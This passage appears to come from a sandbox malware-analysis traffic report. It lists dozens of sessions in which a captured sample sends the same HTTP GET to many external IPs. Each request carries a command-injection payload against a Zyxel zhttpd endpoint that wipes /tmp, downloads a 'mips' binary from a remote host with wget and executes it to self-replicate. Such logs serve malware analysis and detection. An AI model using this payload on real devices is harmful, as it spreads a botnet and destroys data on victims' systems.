                        Mar 12, 2024 08:50:31.076415062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1231192.168.2.1455162201.180.147.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076452017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1232192.168.2.14396382.166.146.118443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076508045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1233192.168.2.1448328159.31.164.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076548100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1234192.168.2.144555639.124.228.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076590061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1235192.168.2.145320677.149.91.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076637030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1236192.168.2.144565883.165.96.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076673985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1237192.168.2.1442638179.91.217.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076703072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1238192.168.2.1440828119.192.27.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076766968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1239192.168.2.1443896193.172.51.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076812029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1240192.168.2.1434096150.206.80.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076858044 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1241192.168.2.1443386209.175.151.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076931000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1242192.168.2.1459952184.10.86.53443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076970100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1243192.168.2.145771841.248.157.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077016115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1244192.168.2.1457770121.121.47.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077043056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1245192.168.2.1456732149.102.209.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077086926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1246192.168.2.1447686193.166.11.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077147961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1247192.168.2.145178820.26.121.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077198029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1248192.168.2.145448038.248.20.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077280998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1249192.168.2.1437840155.6.129.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077322960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1250192.168.2.144180095.247.34.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077348948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1251192.168.2.1444458119.53.173.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077375889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1252192.168.2.1444190193.56.171.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077430010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1253192.168.2.144524895.28.137.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077474117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1254192.168.2.144256263.125.247.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077519894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1255192.168.2.145016287.132.233.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077555895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1256192.168.2.144068099.114.101.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077601910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1257192.168.2.1459552146.150.52.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077650070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1258192.168.2.1451068170.197.142.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077676058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1259192.168.2.144216431.55.182.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077743053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1260192.168.2.143392832.220.148.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077791929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1261192.168.2.1460504107.170.18.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077833891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1262192.168.2.1452566199.24.217.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077883005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1263192.168.2.1457776164.227.209.164443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077927113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1264192.168.2.1458984115.42.247.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.077979088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1265192.168.2.145828239.205.171.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078003883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1266192.168.2.145601071.200.228.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078046083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1267192.168.2.1448862178.28.181.150443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078097105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1268192.168.2.144688086.238.37.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078141928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1269192.168.2.145464620.43.117.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078178883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1270192.168.2.145881032.81.130.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078227043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1271192.168.2.144829686.92.162.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078267097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1272192.168.2.145026614.57.180.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078310966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1273192.168.2.143285453.17.37.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078385115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1274192.168.2.1443624129.74.184.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078421116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1275192.168.2.1433790123.26.180.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078445911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1276192.168.2.1442292148.106.108.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078489065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1277192.168.2.1448130207.213.112.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078527927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1278192.168.2.1456110157.129.13.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078591108 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1279192.168.2.1448258205.165.250.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078624010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1280192.168.2.1451128146.213.241.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078670025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1281192.168.2.146071445.99.71.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078707933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1282192.168.2.145804445.67.239.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078788996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1283192.168.2.143370018.123.140.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078794003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1284192.168.2.145390836.11.213.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078833103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1285192.168.2.143375254.49.99.151443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078862906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1286192.168.2.1437426221.10.103.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078923941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1287192.168.2.1460220200.166.217.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.078953981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1288192.168.2.14444965.220.160.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079022884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1289192.168.2.144599488.224.35.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079094887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1290192.168.2.1452376103.40.191.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079113007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1291192.168.2.1449624139.25.81.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079152107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1292192.168.2.1440242188.176.74.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079164028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1293192.168.2.1441108212.182.27.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079164028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1294192.168.2.1453094176.198.185.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079227924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1295192.168.2.144600613.159.218.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079241991 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1296192.168.2.1447114135.169.130.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079310894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1297192.168.2.14339902.193.133.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079365969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1298192.168.2.1453184212.190.223.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079425097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1299192.168.2.143582434.33.48.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079452038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1300192.168.2.143382672.255.70.249443
